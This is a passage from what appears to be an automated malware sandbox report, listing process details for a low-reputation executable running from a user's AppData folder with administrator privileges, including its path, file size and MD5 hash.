                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Target ID:10
                    Start time:08:59:07
                    Start date:06/08/2022
                    Path:C:\Users\user\AppData\Roaming\fiftikmernk852317.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\AppData\Roaming\fiftikmernk852317.exe"
                    Imagebase:0xdd0000
                    File size:2358784 bytes
                    MD5 hash:5AE8471C10CDB2A59B950E66F8CA8A46
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    Disassembly

                    No disassembly